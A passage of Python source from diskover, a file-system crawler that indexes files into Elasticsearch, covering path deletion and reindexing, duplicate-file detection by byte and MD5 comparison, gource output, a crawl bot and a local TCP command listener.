file_dict['path_parent'] + \"\\\" \\\n AND filename: \\\"\" + file_dict['filename'] + \"\\\"\"\n }\n }\n }\n\n # refresh index\n ES.indices.refresh(index=CLIARGS['index'])\n # search ES\n res = ES.search(index=CLIARGS['index'], doc_type='file', body=data,\n request_timeout=CONFIG['es_timeout'])\n\n for hit in res['hits']['hits']:\n # store any tags\n reindex_file_list.append([hit['_source']['path_parent'] +\n '/' + hit['_source']['filename'],\n hit['_source']['tag'],\n hit['_source']['tag_custom']])\n # delete the file in ES\n ES.delete(index=CLIARGS['index'], doc_type=\"file\", id=hit['_id'])\n\n\ndef index_delete_path(path, recursive=False, crawlbot=False):\n \"\"\"This is the ES delete path bulk function.\n It finds all file and directory docs in path and deletes them from ES\n including the directory (path).\n Recursive will also find and delete all docs in subdirs of path.\n Stores any existing tags in reindex_file_list or reindex_dir_list.\n \"\"\"\n global reindex_file_list\n global reindex_dir_list\n file_id_list = []\n dir_id_list = []\n file_delete_list = []\n dir_delete_list = []\n\n # file doc search\n\n if recursive:\n # escape special characters\n newpath = escape_chars(path)\n data = {\n \"query\": {\n \"query_string\": {\n \"query\": \"path_parent: \" + newpath + \" \\\n OR path_parent: \" + newpath + \"\\/*\",\n \"analyze_wildcard\": \"true\"\n }\n }\n }\n else:\n data = {\n \"query\": {\n \"query_string\": {\n \"query\": \"path_parent: \\\"\" + path + \"\\\"\"\n }\n }\n }\n\n LOGGER.info('Searching for all files in %s' % path)\n # refresh index\n ES.indices.refresh(index=CLIARGS['index'])\n # search ES and start scroll\n res = ES.search(index=CLIARGS['index'], doc_type='file', scroll='1m',\n size=1000, body=data,\n request_timeout=CONFIG['es_timeout'])\n\n while res['hits']['hits'] and len(res['hits']['hits']) > 0:\n for hit in res['hits']['hits']:\n # add doc id to file_id_list\n file_id_list.append(hit['_id'])\n # add file path info inc. tags to reindex_file_list\n reindex_file_list.append([hit['_source']['path_parent'] +\n '/' + hit['_source']['filename'],\n hit['_source']['tag'],\n hit['_source']['tag_custom']])\n # get ES scroll id\n scroll_id = res['_scroll_id']\n # use ES scroll api\n res = ES.scroll(scroll_id=scroll_id, scroll='1m',\n request_timeout=CONFIG['es_timeout'])\n\n LOGGER.info('Found %s files in %s' % (len(file_id_list), path))\n\n # add file id's to delete_list\n for i in file_id_list:\n d = {\n '_op_type': 'delete',\n '_index': CLIARGS['index'],\n '_type': 'file',\n '_id': i\n }\n file_delete_list.append(d)\n\n if (len(file_id_list) > 0 or crawlbot):\n # bulk delete files in ES\n LOGGER.info('Bulk deleting files in ES index')\n # wait for ES health to be at least yellow\n ES.cluster.health(wait_for_status='yellow',\n request_timeout=CONFIG['es_timeout'])\n helpers.bulk(ES, file_delete_list, index=CLIARGS['index'], doc_type='file',\n chunk_size=CONFIG['es_chunksize'],\n request_timeout=CONFIG['es_timeout'])\n\n # directory doc search\n if recursive:\n # escape special characters\n newpath = escape_chars(path)\n data = {\n 'query': {\n 'query_string': {\n 'query': '(path_parent: ' + newpath + ' OR \\\n path_parent: ' + newpath + '\\/*) OR (filename: \"'\n + os.path.basename(path) + '\" AND path_parent: \"'\n + os.path.abspath(os.path.join(path, os.pardir)) + '\")',\n 'analyze_wildcard': 'true'\n }\n }\n }\n else:\n data = {\n 'query': {\n 'query_string': {\n 'query': '(path_parent: \"' + path + '\") OR (filename: \"'\n + os.path.basename(path) + '\" AND path_parent: \"'\n + os.path.abspath(os.path.join(path, os.pardir)) + '\")'\n }\n }\n }\n\n LOGGER.info('Searching for all directories in %s' % path)\n # refresh index\n #ES.indices.refresh(index=CLIARGS['index'])\n # search ES and start scroll\n res = ES.search(index=CLIARGS['index'], doc_type='directory', scroll='1m',\n size=1000, body=data, request_timeout=CONFIG['es_timeout'])\n\n while res['hits']['hits'] and len(res['hits']['hits']) > 0:\n for hit in res['hits']['hits']:\n # add directory doc id to dir_id_list\n dir_id_list.append(hit['_id'])\n # add directory path info inc. tags to reindex_dir_list\n reindex_dir_list.append([hit['_source']['path_parent'] +\n '/' + hit['_source']['filename'],\n hit['_source']['tag'],\n hit['_source']['tag_custom']])\n # get ES scroll id\n scroll_id = res['_scroll_id']\n # use ES scroll api\n res = ES.scroll(scroll_id=scroll_id, scroll='1m',\n request_timeout=CONFIG['es_timeout'])\n\n LOGGER.info('Found %s directories in %s' % (len(dir_id_list), path))\n\n # add dir id's to delete_list\n for i in dir_id_list:\n d = {\n '_op_type': 'delete',\n '_index': CLIARGS['index'],\n '_type': 'directory',\n '_id': i\n }\n dir_delete_list.append(d)\n\n if (len(dir_id_list) > 0 or crawlbot):\n # bulk delete directories in ES\n LOGGER.info('Bulk deleting directories in ES index')\n # wait for ES health to be at least yellow\n ES.cluster.health(wait_for_status='yellow',\n request_timeout=CONFIG['es_timeout'])\n helpers.bulk(ES, dir_delete_list, index=CLIARGS['index'],\n doc_type='directory',\n chunk_size=CONFIG['es_chunksize'],\n request_timeout=CONFIG['es_timeout'])\n\n\ndef index_get_docs(doctype='directory', path=None):\n \"\"\"This is the ES get docs function.\n It finds all docs (by doctype) in ES if no path provided or\n will find all docs in path (non-recursive) and returns doclist\n which contains doc id, fullpath and mtime for all docs.\n \"\"\"\n doclist = []\n\n if not path:\n LOGGER.info('Searching for all %s docs in index', doctype)\n # doc search\n data = {\n '_source': ['path_parent', 'filename', 'last_modified'],\n 'query': {\n 'match_all': {}\n }\n }\n else:\n LOGGER.info('Searching for %s in %s', doctype, path)\n pd = os.path.abspath(os.path.join(path, os.pardir))\n f = os.path.basename(path)\n # directory doc search\n data = {\n '_source': ['path_parent', 'filename', 'last_modified'],\n 'query': {\n 'query_string': {\n 'query': 'path_parent: \"' + path + '\" OR \\\n (path_parent: \"' + pd + '\" AND filename: \"' + f + '\")'\n }\n }\n }\n\n # refresh index\n ES.indices.refresh(index=CLIARGS['index'])\n # search ES and start scroll\n res = ES.search(index=CLIARGS['index'], doc_type=doctype, scroll='1m',\n size=1000, body=data, request_timeout=CONFIG['es_timeout'])\n\n while res['hits']['hits'] and len(res['hits']['hits']) > 0:\n for hit in res['hits']['hits']:\n docid = hit['_id']\n fullpath = hit['_source']['path_parent'] + '/' + hit['_source']['filename']\n # convert es time to unix time format\n mtime = time.mktime(datetime.strptime(\n hit['_source']['last_modified'],\n '%Y-%m-%dT%H:%M:%S').timetuple())\n doclist.append([docid, fullpath, mtime, doctype])\n # get ES scroll id\n scroll_id = res['_scroll_id']\n # use ES scroll api\n res = ES.scroll(scroll_id=scroll_id, scroll='1m',\n request_timeout=CONFIG['es_timeout'])\n\n LOGGER.info('Found %s %s docs' % (len(doclist), doctype))\n\n return doclist\n\n\ndef index_tag_dupe(threadnum, dupelist):\n \"\"\"This is the ES dupe_md5 tag update function.\n It updates a file's dupe_md5 field to be md5sum of file\n if it's marked as a duplicate.\n \"\"\"\n file_id_list = []\n # bulk update data in Elasticsearch index\n for item in dupelist:\n for f in item['files']:\n d = {\n '_op_type': 'update',\n '_index': CLIARGS['index'],\n '_type': 'file',\n '_id': f['id'],\n 'doc': {'dupe_md5': item['filehash']}\n }\n file_id_list.append(d)\n if VERBOSE:\n LOGGER.info('[thread-%s]: Bulk updating files in ES index', threadnum)\n # wait for ES health to be at least yellow\n ES.cluster.health(wait_for_status='yellow',\n request_timeout=CONFIG['es_timeout'])\n helpers.bulk(ES, file_id_list, index=CLIARGS['index'], doc_type='file',\n chunk_size=CONFIG['es_chunksize'],\n request_timeout=CONFIG['es_timeout'])\n\n\ndef tag_dupes(threadnum, hashgroup, dupelist):\n \"\"\"This is the duplicate file tagger.\n It processes files in hashgroup to verify if they are duplicate.\n The first few bytes at beginning and end of files are\n compared and if same, a md5 check is run on the files.\n If the files are duplicate, their dupe_md5 field\n is updated to their md5sum.\n \"\"\"\n global total_dupes\n\n if VERBOSE:\n LOGGER.info('[thread-%s] Processing %s files in hashgroup: %s',\n threadnum, len(hashgroup['files']), hashgroup['filehash'])\n\n # Add first and last few bytes for each file to dictionary\n if VERBOSE:\n LOGGER.info('[thread-%s] Comparing bytes', threadnum)\n\n # create a new dictionary with files that have same byte hash\n hashgroup_bytes = {}\n for file in hashgroup['files']:\n if VERBOSE:\n LOGGER.info('[thread-%s] Checking bytes: %s'\n % (threadnum, file['filename']))\n try:\n f = open(file['filename'], 'rb')\n except (IOError, OSError):\n if VERBOSE:\n LOGGER.error('[thread-%s] Error opening file',\n threadnum, exc_info=True)\n continue\n except Exception:\n if VERBOSE:\n LOGGER.error('[thread-%s] Error opening file',\n threadnum, exc_info=True)\n continue\n # check if files is only 1 byte\n try:\n bytes_f = base64.b64encode(f.read(2))\n except (IOError, OSError):\n if VERBOSE:\n LOGGER.error(\n '[thread-%s] Can\\'t read first 2 bytes, trying first byte',\n threadnum, exc_info=True)\n pass\n try:\n bytes_f = base64.b64encode(f.read(1))\n except Exception:\n if VERBOSE:\n LOGGER.error('[thread-%s] Error reading bytes, giving up',\n threadnum, exc_info=True)\n continue\n try:\n f.seek(-2, os.SEEK_END)\n bytes_l = base64.b64encode(f.read(2))\n except (IOError, OSError):\n if VERBOSE:\n LOGGER.error(\n '[thread-%s] Can\\'t read last 2 bytes, trying last byte',\n threadnum, exc_info=True)\n pass\n try:\n f.seek(-1, os.SEEK_END)\n bytes_l = base64.b64encode(f.read(1))\n except Exception:\n if VERBOSE:\n LOGGER.error('[thread-%s] Error reading bytes, giving up',\n threadnum, exc_info=True)\n continue\n f.close()\n\n # create hash of bytes\n bytestring = str(bytes_f) + str(bytes_l)\n bytehash = hashlib.md5(bytestring.encode('utf-8')).hexdigest()\n\n if VERBOSE:\n LOGGER.info('[thread-%s] Byte hash: %s', threadnum, bytehash)\n\n # create new key for each bytehash and\n # set value as new list and add file\n hashgroup_bytes.setdefault(bytehash, []).append(file['filename'])\n\n # remove any bytehash key that only has 1 item (no duplicate)\n for key, value in list(hashgroup_bytes.items()):\n if len(value) < 2:\n filename = value[0]\n if VERBOSE:\n LOGGER.info(\n '[thread-%s] Unique file (bytes diff), removing: %s',\n threadnum, filename)\n del hashgroup_bytes[key]\n # remove file from hashgroup\n for i in range(len(hashgroup['files'])):\n if hashgroup['files'][i]['filename'] == filename:\n del hashgroup['files'][i]\n break\n\n # run md5 sum check if bytes were same\n hashgroup_md5 = {}\n # do md5 check on files with same byte hashes\n for key, value in list(hashgroup_bytes.items()):\n if VERBOSE:\n LOGGER.info('[thread-%s] Comparing MD5 sums for filehash: %s',\n threadnum, key)\n for filename in value:\n if VERBOSE:\n LOGGER.info('[thread-%s] Checking MD5: %s',\n threadnum, filename)\n # get md5 sum, don't load whole file into memory,\n # load in x KB at a time\n try:\n read_size = CONFIG['md5_readsize']\n md5sum = hashlib.md5()\n with open(filename, 'rb') as f:\n data = f.read(read_size)\n while data:\n md5sum.update(data)\n data = f.read(read_size)\n md5sum = md5sum.hexdigest()\n if VERBOSE:\n LOGGER.info('[thread-%s] MD5: %s', threadnum, md5sum)\n except (IOError, OSError):\n if VERBOSE:\n LOGGER.error('[thread-%s] Error checking file',\n threadnum, exc_info=True)\n continue\n\n # create new key for each md5sum and set value as new list and\n # add file\n hashgroup_md5.setdefault(md5sum, []).append(filename)\n\n # remove any md5sum key that only has 1 item (no duplicate)\n for key, value in list(hashgroup_md5.items()):\n if len(value) < 2:\n filename = value[0]\n if VERBOSE:\n LOGGER.info('[thread-%s] Unique file (MD5 diff), removing: %s',\n threadnum, filename)\n del hashgroup_md5[key]\n # remove file from hashgroup\n for i in range(len(hashgroup['files'])):\n if hashgroup['files'][i]['filename'] == filename:\n del hashgroup['files'][i]\n break\n\n if len(hashgroup['files']) >= 2:\n if VERBOSE:\n LOGGER.info('[thread-%s] Found %s dupes in hashgroup',\n threadnum, len(hashgroup['files']))\n # add hashgroup to dupelist\n dupelist.append(hashgroup)\n\n # add dupe_count to totals\n with lock:\n total_dupes += len(hashgroup['files'])\n\n # bulk add to ES once we reach max chunk size\n if len(dupelist) >= CONFIG['es_chunksize']:\n # update existing index and tag dupe files dupe_md5 field\n index_tag_dupe(threadnum, dupelist)\n del dupelist[:]\n\n return dupelist\n\n\ndef populate_hashgroup(key):\n \"\"\"Searches ES for all files matching hashgroup key (filehash)\n and returns dict containing matching files.\n \"\"\"\n global dupe_count\n\n hashgroup_files = []\n\n data = {\n \"_source\": [\"path_parent\", \"filename\"],\n \"query\": {\n \"bool\": {\n \"must\": {\n \"term\": {\"filehash\": key}\n }\n }\n }\n }\n # refresh index\n #ES.indices.refresh(index=CLIARGS['index'])\n res = ES.search(index=CLIARGS['index'], doc_type='file', size=\"1000\",\n body=data, request_timeout=CONFIG['es_timeout'])\n\n # add any hits to hashgroups\n for hit in res['hits']['hits']:\n hashgroup_files.append(\n {'id': hit['_id'],\n 'filename': hit['_source']['path_parent'] + \"/\" +\n hit['_source']['filename']})\n dupe_count += 1\n\n # add filehash group to queue\n fhg = {'filehash': key, 'files': hashgroup_files}\n\n return fhg\n\n\ndef dupes_finder():\n \"\"\"This is the duplicate file finder function.\n It searches Elasticsearch for files that have the same filehashes\n and adds file hash groups to Queue.\n \"\"\"\n global total_hash_groups\n\n # find the filehashes with largest files and add filehash keys\n # to hashgroups\n data = {\n \"size\": 0,\n \"query\": {\n \"bool\": {\n \"must\": {\n \"term\": {\"hardlinks\": 1}\n },\n \"filter\": {\n \"range\": {\n \"filesize\": {\"gte\": CLIARGS['minsize']}\n }\n }\n }\n },\n \"aggs\": {\n \"dupe_filehash\": {\n \"terms\": {\n \"field\": \"filehash\",\n \"min_doc_count\": 2,\n \"size\": 10000,\n \"order\": {\"max_file_size\": \"desc\"}\n },\n \"aggs\": {\n \"max_file_size\": {\"max\": {\"field\": \"filesize\"}}\n }\n }\n }\n }\n\n # refresh index\n ES.indices.refresh(index=CLIARGS['index'])\n res = ES.search(index=CLIARGS['index'], doc_type='file', body=data,\n request_timeout=CONFIG['es_timeout'])\n\n # add hash keys to Queue\n for bucket in res['aggregations']['dupe_filehash']['buckets']:\n total_hash_groups += 1\n q.put(bucket['key'])\n\n\ndef get_time(seconds):\n \"\"\"This is the get time function\n It returns human readable time format for stats.\n \"\"\"\n m, s = divmod(seconds, 60)\n h, m = divmod(m, 60)\n return \"%dh:%02dm:%02ds\" % (h, m, s)\n\n\ndef convert_size(size_bytes):\n \"\"\"This is the convert size function\n It returns human readable file sizes.\n \"\"\"\n if size_bytes == 0:\n return \"0B\"\n size_name = (\"B\", \"KB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\", \"YB\")\n i = int(math.floor(math.log(size_bytes, 1024)))\n p = math.pow(1024, i)\n s = round(size_bytes / p, 2)\n return \"%s %s\" % (s, size_name[i])\n\n\ndef print_stats(stats_type):\n \"\"\"This is the print stats function\n It outputs stats at the end of runtime.\n \"\"\"\n elapsedtime = time.time() - STARTTIME\n if stats_type is \"crawl\":\n # add stats to ES\n add_crawl_stats(STARTTIME, time.time(), elapsedtime)\n sys.stdout.flush()\n LOGGER.disabled = True\n\n if stats_type is 'crawl':\n sys.stdout.write(\"\\n\\033[%s********************************* \\\nCRAWL STATS *********************************\\033[0m\\n\" % BANNER_COLOR)\n sys.stdout.write(\"\\033[%s Directories: %s\\033[0m\" % (BANNER_COLOR,\n total_dirs))\n sys.stdout.write(\"\\033[%s / Skipped: %s\\033[0m\\n\" % (\n BANNER_COLOR, total_dirs_skipped))\n sys.stdout.write(\n \"\\033[%s Files: %s (%s)\\033[0m\"\n % (BANNER_COLOR, total_files, convert_size(total_file_size)))\n sys.stdout.write(\n \"\\033[%s / Skipped: %s (%s)\\033[0m\\n\"\n % (BANNER_COLOR, total_files_skipped,\n convert_size(total_file_size_skipped)))\n\n elif stats_type is 'updating_dupe':\n sys.stdout.write(\"\\n\\033[%s********************************* \\\nDUPES STATS *********************************\\033[0m\\n\" % BANNER_COLOR)\n sys.stdout.write(\"\\033[%s Files checked: %s \\\n(%s filehash groups)\\033[0m\\n\" % (BANNER_COLOR, dupe_count, total_hash_groups))\n sys.stdout.write(\"\\033[%s Duplicates tagged: \\\n%s\\033[0m\\n\" % (BANNER_COLOR, total_dupes))\n\n sys.stdout.write(\"\\033[%s Elapsed time: \\\n%s\\033[0m\\n\" % (BANNER_COLOR, get_time(elapsedtime)))\n sys.stdout.write(\"\\033[%s******************************************\\\n*************************************\\033[0m\\n\\n\" % BANNER_COLOR)\n sys.stdout.flush()\n\n\ndef gource():\n \"\"\"This is the gource visualization function.\n It uses the Elasticsearch scroll api to get all the data\n for gource.\n \"\"\"\n\n if CLIARGS['gourcert']:\n data = {\n \"sort\": {\n \"indexing_date\": {\n \"order\": \"asc\"\n }\n }\n }\n elif CLIARGS['gourcemt']:\n data = {\n \"sort\": {\n \"last_modified\": {\n \"order\": \"asc\"\n }\n }\n }\n\n # refresh index\n ES.indices.refresh(index=CLIARGS['index'])\n # search ES and start scroll\n res = ES.search(index=CLIARGS['index'], doc_type='file', scroll='1m',\n size=100, body=data, request_timeout=CONFIG['es_timeout'])\n\n while res['hits']['hits'] and len(res['hits']['hits']) > 0:\n for hit in res['hits']['hits']:\n if CLIARGS['gourcert']:\n # convert date to unix time\n d = str(int(time.mktime(datetime.strptime(\n hit['_source']['indexing_date'],\n '%Y-%m-%dT%H:%M:%S.%f').timetuple())))\n u = str(hit['_source']['indexing_thread'])\n t = 'A'\n elif CLIARGS['gourcemt']:\n d = str(int(time.mktime(datetime.strptime(\n hit['_source']['last_modified'],\n '%Y-%m-%dT%H:%M:%S').timetuple())))\n u = str(hit['_source']['owner'])\n t = 'M'\n f = str(hit['_source']['path_parent'] + \"/\" +\n hit['_source']['filename'])\n output = d + '|' + u + '|' + t + '|' + f\n try:\n # output for gource\n sys.stdout.write(output + '\\n')\n sys.stdout.flush()\n except Exception:\n sys.exit(1)\n if CLIARGS['gourcert']:\n # slow down output for gource\n time.sleep(CONFIG['gource_maxfilelag'])\n\n # get ES scroll id\n scroll_id = res['_scroll_id']\n\n # use ES scroll api\n res = ES.scroll(scroll_id=scroll_id, scroll='1m',\n request_timeout=CONFIG['es_timeout'])\n\n\ndef run_command(threadnum, command_dict, clientsock, lock):\n \"\"\"This is the run command function.\n It runs commands from the listener socket\n using values in command_dict.\n \"\"\"\n global socket_tasks\n global clientlist\n\n # try to get index name from command or use from config file\n try:\n index = command_dict['index']\n except KeyError:\n index = CONFIG['index']\n pass\n # try to get threads from command or use default\n try:\n threads = str(command_dict['threads'])\n except KeyError:\n threads = str(CLIARGS['threads'])\n pass\n\n try:\n action = command_dict['action']\n pythonpath = CONFIG['listener_python_path']\n diskoverpath = CONFIG['listener_diskover_path']\n\n # set up command for different action\n if action == 'crawl':\n path = command_dict['path']\n cmd = [\n pythonpath, '-u', diskoverpath, '-t', threads,\n '-i', index, '-d', path, '--progress']\n\n elif action == 'finddupes':\n cmd = [\n pythonpath, '-u', diskoverpath, '-t', threads,\n '-i', index, '--finddupes', '--progress']\n\n elif action == 'reindex':\n try:\n recursive = command_dict['recursive']\n except KeyError:\n recursive = 'false'\n pass\n path = command_dict['path']\n if recursive == 'true':\n cmd = [\n pythonpath, '-u', diskoverpath, '-t', threads,\n '-i', index, '-d', path, '-R', '--progress']\n else:\n cmd = [\n pythonpath, '-u', diskoverpath, '-t', threads,\n '-i', index, '-d', path, '-r', '--progress']\n\n elif action == 'dirsize':\n try:\n path = command_dict['path']\n except KeyError:\n path = None\n pass\n if path:\n cmd = [\n pythonpath, '-u', diskoverpath, '-t', threads,\n '-i', index, '-S', path, '--progress']\n else:\n cmd = [\n pythonpath, '-u', diskoverpath, '-t', threads,\n '-i', index, '-S', '--progress']\n\n elif action == 'kill':\n taskid = command_dict['taskid']\n LOGGER.info(\"[thread-%s]: Kill task message received! (taskid:%s)\",\n threadnum, taskid)\n message = b'{\"msg\": \"exit\"}\\n'\n clientsock.send(message)\n LOGGER.debug(message)\n return\n\n else:\n LOGGER.warning(\"Unknown action\")\n message = b'{\"msg\": \"error\"}\\n'\n clientsock.send(message)\n LOGGER.debug(message)\n return\n\n # run command using subprocess\n starttime = time.time()\n taskid = str(uuid.uuid4()).encode('utf-8')\n\n # start process\n process = Popen(cmd, stdout=PIPE)\n # add process to socket_tasks dict\n with lock:\n socket_tasks[taskid] = process\n\n message = b'{\"msg\": \"taskid\", \"id\": \"%s\"}\\n' % taskid\n clientsock.send(message)\n LOGGER.debug(message)\n\n LOGGER.info(\"[thread-%s]: Running command (taskid:%s)\",\n threadnum, taskid)\n LOGGER.info(cmd)\n # send each stdout line to client\n while True:\n nextline = process.stdout.readline()\n if nextline != b'\\n' and nextline != b'':\n message = nextline + '\\n'.encode('utf-8')\n clientsock.send(nextline)\n LOGGER.debug(nextline)\n else:\n break\n\n # send exit msg to client\n output = process.communicate()[0]\n exitcode = str(process.returncode).encode('utf-8')\n elapsedtime = str(get_time(time.time() - starttime)).encode('utf-8')\n LOGGER.info(\"Command exit code: %s, elapsed time: %s\"\n % (exitcode, elapsedtime))\n message = b'{\"msg\": \"exit\", \"exitcode\": %s, \"elapsedtime\": \"%s\"}\\n' % (exitcode, elapsedtime)\n clientsock.send(message)\n LOGGER.debug(message)\n\n except KeyError:\n LOGGER.warning(\"Invalid command\")\n message = b'{\"msg\": \"error\"}\\n'\n clientsock.send(message)\n LOGGER.debug(message)\n pass\n\n except socket.error as e:\n LOGGER.error(\"[thread-%s]: Socket error (%s)\" % (threadnum, e))\n pass\n\n\ndef socket_thread_handler(threadnum, q, lock):\n \"\"\"This is the socket thread handler function.\n It runs the command msg sent from client.\n \"\"\"\n BUFF = 1024\n while True:\n try:\n c = q.get()\n clientsock, addr = c\n LOGGER.debug(clientsock)\n LOGGER.debug(addr)\n data = clientsock.recv(BUFF)\n LOGGER.debug(data)\n if not data:\n # close connection to client\n clientsock.close()\n LOGGER.info(\"[thread-%s]: %s closed connection\"\n % (threadnum, str(addr)))\n q.task_done()\n continue\n # check if ping msg\n elif data == b'ping':\n LOGGER.info(\"[thread-%s]: Got ping from %s\"\n % (threadnum, str(addr)))\n # send pong reply\n message = b'pong'\n clientsock.send(message)\n LOGGER.debug(message)\n else:\n LOGGER.info(\"[thread-%s]: Got command from %s\"\n % (threadnum, str(addr)))\n # get JSON command\n LOGGER.debug(data)\n # load json and store in dict\n command_dict = json.loads(data.decode('utf-8'))\n LOGGER.debug(command_dict)\n # run command from json data\n run_command(threadnum, command_dict, clientsock, lock)\n\n # close connection to client\n clientsock.close()\n LOGGER.info(\"[thread-%s]: %s closed connection\"\n % (threadnum, str(addr)))\n q.task_done()\n\n except (ValueError, TypeError) as e:\n LOGGER.warning(\"[thread-%s]: Invalid JSON from %s: (%s)\"\n % (threadnum, str(addr), e))\n message = b'{\"msg\": \"error\"}\\n'\n clientsock.send(message)\n LOGGER.debug(message)\n # close connection to client\n clientsock.close()\n LOGGER.info(\"[thread-%s]: %s closed connection\"\n % (threadnum, str(addr)))\n q.task_done()\n pass\n\n except socket.error as e:\n LOGGER.error(\"[thread-%s]: Socket error (%s)\" % (threadnum, e))\n # close connection to client\n clientsock.close()\n LOGGER.info(\"[thread-%s]: %s closed connection\"\n % (threadnum, str(addr)))\n q.task_done()\n pass\n\n\ndef start_socket_server():\n \"\"\"This is the start socket server function.\n It opens a socket and waits for remote commands.\n \"\"\"\n global clientlist\n\n # set thread/connection limit\n max_connections = 5\n\n # Queue for socket threads\n q = Queue.Queue(maxsize=max_connections)\n lock = threading.RLock()\n\n try:\n # create TCP socket object\n serversock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n serversock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\n host = CONFIG['listener_host'] # default is localhost\n port = CONFIG['listener_port'] # default is 9999\n\n # bind to port\n serversock.bind((host, port))\n\n # start listener\n serversock.listen(max_connections)\n\n threads = []\n # set up the threads and start them\n for i in range(max_connections):\n # create thread\n t = threading.Thread(target=socket_thread_handler, args=(i, q, lock))\n t.daemon = True\n t.start()\n threads.append(t)\n\n while True:\n LOGGER.info(\"Waiting for connection, listening on %s port %s TCP\"\n % (str(host), str(port)))\n # establish connection\n clientsock, addr = serversock.accept()\n LOGGER.debug(clientsock)\n LOGGER.debug(addr)\n LOGGER.info(\"Got a connection from %s\" % str(addr))\n # add client to list\n client = [clientsock, addr]\n clientlist.append(client)\n # add task to Queue\n q.put(client)\n\n except socket.error as e:\n serversock.close()\n LOGGER.error(\"Error opening socket (%s)\" % e)\n sys.exit(1)\n\n except KeyboardInterrupt:\n print('\\nCtrl-c keyboard interrupt received, closing socket')\n q.join()\n serversock.close()\n sys.exit(0)\n\n\ndef log_setup():\n \"\"\"This is the log set up function.\n It configures log output for diskover.\n \"\"\"\n diskover_logger = logging.getLogger('diskover')\n diskover_logger.setLevel(logging.INFO)\n es_logger = logging.getLogger('elasticsearch')\n es_logger.setLevel(logging.WARNING)\n urllib3_logger = logging.getLogger('urllib3')\n urllib3_logger.setLevel(logging.WARNING)\n requests_logger = logging.getLogger('requests')\n requests_logger.setLevel(logging.WARNING)\n logging.addLevelName(\n logging.INFO, \"\\033[1;32m%s\\033[1;0m\"\n % logging.getLevelName(logging.INFO))\n logging.addLevelName(\n logging.WARNING, \"\\033[1;31m%s\\033[1;0m\"\n % logging.getLevelName(logging.WARNING))\n logging.addLevelName(\n logging.ERROR, \"\\033[1;41m%s\\033[1;0m\"\n % logging.getLevelName(logging.ERROR))\n logging.addLevelName(\n logging.DEBUG, \"\\033[1;33m%s\\033[1;0m\"\n % logging.getLevelName(logging.DEBUG))\n logformatter = '%(asctime)s [%(levelname)s][%(name)s] %(message)s'\n loglevel = logging.INFO\n logging.basicConfig(format=logformatter, level=loglevel)\n if CLIARGS['verbose']:\n diskover_logger.setLevel(logging.INFO)\n es_logger.setLevel(logging.INFO)\n urllib3_logger.setLevel(logging.INFO)\n requests_logger.setLevel(logging.INFO)\n if CLIARGS['debug']:\n diskover_logger.setLevel(logging.DEBUG)\n es_logger.setLevel(logging.DEBUG)\n urllib3_logger.setLevel(logging.DEBUG)\n requests_logger.setLevel(logging.DEBUG)\n if CLIARGS['quiet'] or CLIARGS['progress'] or \\\n CLIARGS['gourcert'] or CLIARGS['gourcemt']:\n diskover_logger.disabled = True\n es_logger.disabled = True\n urllib3_logger.disabled = True\n requests_logger.disabled = True\n\n # check if we want to run with verbose logging\n verbose = False\n if CLIARGS['verbose'] or CLIARGS['debug']:\n verbose = True\n\n return diskover_logger, verbose\n\n\ndef start_crawl_bot(dirlist):\n \"\"\"This is the crawl bot function.\n It uses dirlist which contains paths and their mtimes\n and scans for any changes to directories in that list\n and updates directories which have newer mtime.\n \"\"\"\n global total_dirs\n\n LOGGER.info('diskover crawl bot starting up')\n LOGGER.info('randomly scanning for changes every %s sec', CONFIG['botsleep'])\n LOGGER.info('*** press Ctrl-c to shutdown ***')\n\n try:\n i = len(dirlist) - 1\n t = time.time()\n c = 0\n n = 1\n last_path = '';\n while True:\n if (time.time() - t >= 60):\n t = get_time(time.time() - STARTTIME)\n # display stats if 1 min elapsed\n LOGGER.info('### crawlbot stats: %s dirs checked (%s dir/s), %s dirs updated, running for %s ###',\n n, round(n / 60, 1), c, t)\n t = time.time()\n n = 1\n total_dirs = 0\n li = randint(0, i)\n path = dirlist[li][1]\n mtime_utc = dirlist[li][2]\n # pick a new path if same as last time\n if path == last_path:\n continue\n last_path = path\n if VERBOSE:\n LOGGER.info('checking %s', path)\n try:\n mtime_now_utc = time.mktime(time.gmtime(os.lstat(path).st_mtime))\n except (IOError, OSError):\n if VERBOSE:\n LOGGER.error('Error crawling directory %s', path, exc_info=True)\n continue\n if (mtime_now_utc == mtime_utc):\n pass\n else:\n c += 1\n LOGGER.info('*** mtime changed! reindexing directory ***')\n # delete existing path docs\n index_delete_path(path, crawlbot=True)\n # reindex path\n worker_setup_crawl(path, crawlbot=True)\n if CLIARGS['dirsize']:\n dirlist_path = index_get_docs('directory', path)\n # update directory size\n worker_setup_dirsizes(dirlist_path, crawlbot=True)\n time.sleep(CONFIG['botsleep'])\n n += 1\n except KeyboardInterrupt:\n print('\\nCtrl-c keyboard interrupt received, exiting')\n sys.exit(0)\n\n\nif __name__ == \"__main__\":\n # load config file into CONFIG dictionary\n CONFIG = load_config()\n\n # parse cli arguments into CLIARGS dictionary\n CLIARGS = vars(parse_cli_args(CONFIG['index']))\n\n # load any available plugins\n plugins = load_plugins()\n\n # list plugins\n if CLIARGS['listplugins']:\n print(\"diskover plugins:\")\n list_plugins()\n sys.exit(0)\n\n # check index name\n if CLIARGS['index'] == \"diskover\" or \\\n CLIARGS['index'].split('-')[0] != \"diskover\":\n print('Please name your index: diskover-')\n sys.exit(0)\n\n if not CLIARGS['gourcert'] and not CLIARGS['gourcemt']:\n # check we are root\n if os.geteuid():\n print('Please run as root')\n sys.exit(1)\n\n if not CLIARGS['quiet'] and not CLIARGS['progress'] and \\\n not CLIARGS['gourcert'] and not CLIARGS['gourcemt']:\n # print random banner\n print_banner()\n\n # set up logging\n LOGGER, VERBOSE = log_setup()\n\n # check for listen socket cli flag\n if CLIARGS['listen']:\n start_socket_server()\n sys.exit(0)\n\n # print plugins\n plugins_list = \"\"\n for i in get_plugins_info():\n plugins_list = plugins_list + i[\"name\"] + \" \"\n if plugins:\n LOGGER.info(\"Plugins loaded: %s\", plugins_list)\n\n # connect to Elasticsearch\n ES = elasticsearch_connect()\n\n # check for gource cli flags\n if CLIARGS['gourcert'] or CLIARGS['gourcemt']:\n try:\n gource()\n except KeyboardInterrupt:\n print('\\nCtrl-c keyboard interrupt received, exiting')\n sys.exit(0)\n\n # check if directory exists\n if CLIARGS['rootdir']:\n if not os.path.exists(CLIARGS['rootdir']) or not \\\n os.path.isdir(CLIARGS['rootdir']):\n LOGGER.error(\"Rootdir path not found or not a directory, exiting\")\n 